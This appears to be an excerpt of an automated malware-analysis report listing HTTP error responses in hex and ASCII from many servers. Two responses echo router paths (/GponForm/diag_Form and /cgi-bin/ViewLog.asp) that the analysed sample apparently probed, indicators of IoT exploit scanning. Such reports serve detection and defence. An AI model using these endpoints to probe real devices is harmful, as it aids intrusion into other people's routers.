68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:58:27 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 18:58:28 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 18:58:28 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 11:27:13 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:30 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:58:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 18 Mar 2024 08:58:31 GMTContent-Type: text/htmlContent-Length: 2867Connection: keep-aliveETag: "6391baca-b33"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Type: text/htmlContent-Length: 1140Date: Mon, 18 Mar 2024 08:58:32 GMTServer: DWSData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 09 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 4f 4e 54 45 4e 54 2d 54 59 50 45 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 62 69 67 35 22 3e 0a 09 3c 54 49 54 4c 45 3e 3c 2f 54 49 54 4c 45 3e 0a 09 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 47 45 4e 45 52 41 54 4f 52 22 20 43 4f 4e 54 45 4e 54 3d 22 4f 70 65 6e 4f 66 66 69 63 65 2e 6f 72 67 20 32 2e 34 20 20 28 57 69 6e 33 32 29 22 3e 0a 09 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 43 52 45 41 54 45 44 22 20 43 4f 4e 54 45 4e 54 3d 22 32 30 31 30 30 34 33 30 3b 31 31 34 34 31 37 37 33 22 3e 0a 09 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 43 48 41 4e 47 45 44 22 20 43 4f 4e 54 45 4e 54 3d 22 32 30 31 30 30 35 30 34 3b 31 36 30 37 34 38 39 38 22 3e 0a 09 3c 53 54 59 4c 45 20 54 59 50 45 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 3c 21 2d 2d 0a 09 09 40 70 61 67 65 20 7b 20 73 69 7a 65 3a 20 32 31 63 6d 20 32 39 2e 37 63 6d 3b 20 6d 61 72 67 69 6e 3a 20 32 63 6d 20 7d 0a 09 09 50 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 2e 32 31 63 6d 20 7d 0a 09 2d 2d 3e 0a 09 3c 2f 53 54 59 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 4c 41 4e 47 3d 22 7a 68 2d 54 57 22 20 44 49 52 3d 22 4c 54 52 22 3e 0a 3c 48 31 3e 3c 46 4f 4e 54 20 43 4f 4c 4f 52 3d 22 23 66 66 36 36 33 33 22 3e 3c 46 4f 4e 54 20 46 41 43 45 3d 22 54 68 6f 72 6e 64 61 6c 65 2c 20 73 65 72 69 66 22 3e 3c 53 50 41 4e 20 4c 41 4e 47 3d 22 65 6e 2d 55 53 22 3e 49 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 53 50 41 4e 3e 3c 2f 46 4f 4e 54 3e 3c 2f 46 4f 4e 54 3e 3c 2f 48 31 3e 0a 3c 50 3e 3c 46 4f 4e 54 20 46 41 43 45 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 6e 2c 20 73 65 72 69 66 22 3e 3c 53 50 41 4e 20 4c 41 4e 47 3d 22 65 6e 2d 55 53 22 3e 3c 46 4f 4e 54 20 43 4f 4c 4f 52 3d 22 23 30 30 30 30 30 30 22 3e 3c 46 4f 4e 54 20 46 41 43 45 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 6e 2c 20 73 65 72 69 66 22 3e 3c 53 50 41 4e 20 4c 41 4e 47 3d 22 65 6e 2d 55 53 22 3e 3c 42 3e 46 69 6c 65 20 0a 6e 6f 74 20 66 6f 75 6e 64 21 20 50 6c 65 61 73 65 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 72 61 79 74 65 6b 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 6b 32 26 76 69 65 77 3d 69 74 65 6d 6c 69 73 74 26 74 61 73 6b 3d 63 61 74 65 67 6f 72 79 26 69 64 3d 32 31 30 26 49 74 65 6d 69 64 3d 32 39 33 26 6c 61 6e 67 3d 65 6e 22 20 54 41 52 47 45 54 3d 22 5f 62 6c 61 6e 6b 22 3e 76 69 73 69 74 0a 6f 75 72 20 73 75 70 70 6f 72 74 20 73 69 74 65 3c 2f 41 3e 20 6f 72 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 72 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2004 19:34:25 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 18 Mar 2024 08:58:33 GMTContent-Type: text/htmlContent-Length: 2867Connection: keep-aliveETag: "6391baca-b33"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:58:33 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 38 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 31 34 32 2e 31 34 36 2e 32 31 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:58:33 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML P
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:33 GMTServer: Apache/2.2.24 (FreeBSD) PHP/5.2.17 with Suhosin-Patch proxy_html/3.1.2 mod_ssl/2.2.24 OpenSSL/0.9.8zd-freebsd DAV/2Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Set-Cookie: _d_id=8a0002f9e7de6509a4094f8893e684; Path=/; HttpOnly; SameSite=LaxDate: Mon, 18 Mar 2024 08:58:33 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.21 18oct2014Date: Tue, 01 Dec 2020 14:27:15 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 63 63 39 39 39 39 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 0a 20 20 20 20 3c 68 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 20 20 20 20 3c 68 72 3e 0a 0a 20 20 20 20 3c 61 64 64 72 65 73 73 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 32 31 20 31 38 6f 63 74 32 30 31 34 3c 2f 61 3e 3c 2f 61 64 64 72 65 73 73 3e 0a 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <title>404 Not Found</title> </head> <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc"> <h4>404 Not Found</h4>File not found. <hr> <address><a href="http://www.acme.com/software/mini_httpd/">mini_httpd/1.21 18oct2014</a></address> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.4Date: Mon, 18 Mar 2024 08:58:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.4</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:58:41 GMTServer: Apache/2.4.6 (Ubuntu)Content-Length: 310Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 3f 69 6d 61 67 65 73 2f 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 37 2e 38 37 2e 31 33 31 2e 31 34 32 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /GponForm/diag_Form?images/ on this server.</p><hr><address>Apache/2.4.6 (Ubuntu) Server at 187.87.131.142 Port 8080</address></body></html>
